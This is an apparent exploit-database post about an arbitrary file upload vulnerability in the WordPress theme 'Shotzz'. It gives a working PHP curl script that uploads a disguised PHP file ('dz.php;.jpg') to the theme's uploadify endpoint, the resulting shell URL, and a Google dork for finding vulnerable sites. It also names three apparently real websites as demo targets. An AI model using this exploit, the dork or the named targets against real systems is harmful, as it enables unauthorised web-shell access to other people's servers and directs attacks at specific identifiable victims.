facebook facebook twitter rss

Wordpress Themes- Shotzz Arbitrary File Upload Vulnerability

Author: Zikou-16 , Published: 30-11-2012
 -------------------------------------------------------------------------------
Wordpress Themes- Shotzz Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------

######################################################################################
#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"wp-content/themes/shotzz"
#
#######################################################################################

---------------------------------------------------------------------------------------

Exploit : uploadshell.php;.jpg or ;.gif

<?php

$uploadfile
="dz.php;.jpg";

$ch curl_init("http://www.localhost/wp-content/themes/shotzz/sprites/js/uploadify/uploadify.php?folder=/wp-content/themes/shotzz/sprites/js/cufon-fonts/uploaded/");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";

?>


Shell Access : http://www.localhost/wp-content/themes/shotzz/sprites/js/cufon-fonts/uploaded/custom_dz.php;.jpg

dz.php;.jpg
<?php
phpinfo
();
?>


---------------------------------------------------------------------------------------

Demo :

1) http://binar.ie/project/wp-content/themes/shotzz/sprites/js/uploadify/uploadify.php

2) http://syhpress.com/wp-content/themes/shotzz/sprites/js/uploadify/uploadify.php

3) http://bestoffredericksburgtx.com/wp-content/themes/shotzz/sprites/js/uploadify/uploadify.php

-----------------------------------------------------------------------------------------

Like us on Facebook :